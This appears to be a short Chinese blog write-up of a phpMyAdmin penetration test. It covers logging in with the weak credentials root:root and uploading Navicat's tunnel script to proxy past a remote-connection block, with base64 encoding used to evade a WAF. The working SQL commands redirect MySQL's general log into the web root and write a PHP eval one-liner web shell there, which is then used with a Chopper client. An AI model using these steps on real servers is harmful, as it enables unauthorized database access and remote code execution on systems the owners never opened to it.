首先通过目录扫描对某站进行扫描，发现存在phpmyadmin，尝试弱口令root：root很幸运进去了

尝试使用Navicate进行数据库连接返回禁止远程连接数据库：

但是远程命令执行发现本地3306端口时开放的，于是尝试通过代理进行连接：

Navicat安装目录下上传ntunnel_mysql.php文件（数据库的代理脚本）到目标服务器任意web站点目录（后面getshell后上传的）

上传到D:/phpStudy/WWW目录进行访问http://XXX/ntunnel_mysql.php 测试成功

进行测试连接：

（此时,在本地打开Navicat配置http连接,这里的通道地址就写你上面访问的那个url,说白点儿就是个代理端,勾上使用base64编码,防止waf从中作祟,然后主机名写localhost,账号密码写lnmp01本地数据库用户的账号即可,因为要连接lnmp01本地的mysql）

Phpmyadmin Get Shell：

利用日志文件

mysql 5.0版本以上会创建日志文件，修改日志的全局变量，也可以getshell。但是也要对生成的日志有可读可写的权限。

set global general_log = "ON";   #当开启general时，所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件那么，如果修改general_log_file的值，那么所执行的sql语句就会对应生成进而getshell
SET global general_log_file='D:/phpStudy/WWW/test1234.php';  #对应就会生成test1234.php文件
select '<?php eval($_POST[2019]);?>';          #将一句话木马写入test1234.php文件

菜刀连接：

以上就是分享Phpmyadmin的一次渗透测试的详细内容，更多请关注群英网络其它相关文章！